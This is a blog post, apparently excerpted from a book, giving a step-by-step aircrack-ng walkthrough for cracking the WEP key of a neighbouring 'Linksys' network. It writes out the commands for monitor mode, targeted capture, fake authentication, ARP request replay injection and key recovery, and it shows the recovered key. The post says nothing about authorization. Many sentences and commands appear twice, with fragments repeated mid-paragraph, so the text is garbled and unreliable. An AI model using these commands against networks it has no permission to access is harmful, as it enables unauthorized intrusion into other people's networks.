WEP (Wired Equivalent Privacy) was one of the first authentication and encryption used for wireless networks; it’s been known to be insecure for a decade due to some cryptographic weaknesses related to initialization vectors, key management, etc., which we won’t discuss in this post, since it’s a completely different topic.
Though it’s deprecated and should never be used, we still see it being used in lots of home
networks, one of the reasons being the usage of very old routers that don’t support WPA, WPA2 encryption, the other reason being lack of awareness.
So in this section, we will use aircrack-ng to demonstrate how easy it is to crack a WEP key no matter how complex it is.
Though it’s deprecated and should never be used, we still see it being used in lots of home
networks, one of the reasons being the usage of very old routers that don’t support WPA, WPA2 encryption, the other reason being lack of awareness.
So in this section, we will use aircrack-ng to demonstrate how easy it is to crack a WEP key no matter how complex it is.
PLACING YOUR WIRELESS ADAPTER IN MONITOR MODE
Step 1—First things first: we need to make sure that our network card is placed into monitor mode, we have already learnt that we can use the “airmon-ng start wlan0” command to accomplish this task. We can use “iwconfig” to verify that our wireless adapter is now able to sniff in monitor mode.
DETERMINING THE TARGET WITH AIRODUMP-NG
Step 2—Next, we will use airodump-ng to discover our neighbor networks with WEP encryption enabled. We can see our target with an essid (same as ssid) of “Linksys” and with BSSID of 98:FC:11:C9:14:22 and it’s on the channel 6. We should make a note of the essid, bssid, and channel because we will need them in future.
Command:
airodump-ng mon0
Command:
airodump-ng mon0
ATTACKING THE TARGET
Step 3—In order to crack the WEP key, we would need to capture of the contents of the data
file and write it to a file which we can analyze later. To accomplish this task, we would use
airodump and restrict our monitoring only to the access point (ap) we are targeting.
file and write it to a file which we can analyze later. To accomplish this task, we would use
airodump and restrict our monitoring only to the access point (ap) we are targeting.
STRUCTURE
airodump-ng mon0 –bssid –c (channel) –w (file name to save)
Command:
airodump-ng mon0 –bssid 98:fc:11:c9:14:22 –channel 6 –write RHAWEP
Command:
airodump-ng mon0 –bssid 98:fc:11:c9:14:22 –channel 6 –write RHAWEP
We had to specify the bssid of the target that we learnt from the previous step, followed by the channel that the access point is on, which we also learnt from previous step (channel 6). The reason we want to restrict it to channel 6 is that we don’t want our wireless card to switch channels. Then we instruct it to write the results to a file called RHAWEP. The file would be in several formats, such as kismet, cap, etc., so that we can analyze it using different tools. What we are interested in is the contents of the cap file.
SPEEDING UP THE CRACKING PROCESS
Step 4—In order to decrypt the wep key, we would need data packets, but waiting to collect
them would be time consuming. To speed up this process, we can use a fake authentication
attack which will associate our MAC address with the access point. This attack is only useful
in the case where we have no clients associated with the access point.
them would be time consuming. To speed up this process, we can use a fake authentication
attack which will associate our MAC address with the access point. This attack is only useful
in the case where we have no clients associated with the access point.
STRUCTURE
aireplay-ng – 1 3 –a (bssid of the target) (interface)
Command:
aireplay-ng -1 3 –a 98:fc:11:c9:14:22 mon0
Command:
aireplay-ng -1 3 –a 98:fc:11:c9:14:22 mon0
The –1 parameter specifies that we want to use a fake authentication attack followed by the
number of times we want to send the authentication request, then the –a parameter followed by the BSSID of the target and the interface, which is mon0.
number of times we want to send the authentication request, then the –a parameter followed by the BSSID of the target and the interface, which is mon0.
INJECTING ARP PACKETS
Step 5—The success rate of our attack depends upon the number of initialization vectors we
gather. A fake authentication attack does not generate ARP packets, therefore, we would
need to use the attack number 3—“ARP Request Replay”—which is the most effective way
of generating initialization vectors.
gather. A fake authentication attack does not generate ARP packets, therefore, we would
need to use the attack number 3—“ARP Request Replay”—which is the most effective way
of generating initialization vectors.
STRUCTURE
aireplay-ng 3 –b (bssid of target) –h (Mac address of mon0) (interface)
Command:
aireplay-ng -3 –b 98:fc:11:c9:14:22 –h 00:c0:ca:50:f8:32 mon0
Command:
aireplay-ng -3 –b 98:fc:11:c9:14:22 –h 00:c0:ca:50:f8:32 mon0
The –3 stands for the “ARP Request REPLAY”, followed by the –b parameter, which would
be the BSSID of the target. The –h parameter is new parameter that we haven’t used before, this would be the MAC address of the mon0 interface.
Now, we will wait for the number of data packets to reach at least 20,000; the more packets
the more quickly the key can be decrypted.
be the BSSID of the target. The –h parameter is new parameter that we haven’t used before, this would be the MAC address of the mon0 interface.
Now, we will wait for the number of data packets to reach at least 20,000; the more packets
the more quickly the key can be decrypted.
CRACKING THE WEP
Step 6—Finally, it’s the time to decrypt the contents of the RHAWEP-0.1-cap file. We will use aircrack-ng to do this.
Command:
aircrack-ng RHAWEP-0.1-cap
Command:
aircrack-ng RHAWEP-0.1-cap
So, we have successfully managed to decrypt the key, which is C3:6E:E8:F7:82. Just remove
the colons from the output and you will be left with the original wep key, which in this case is C36EE8F782.
the colons from the output and you will be left with the original wep key, which in this case is C36EE8F782.
No comments:
Post a Comment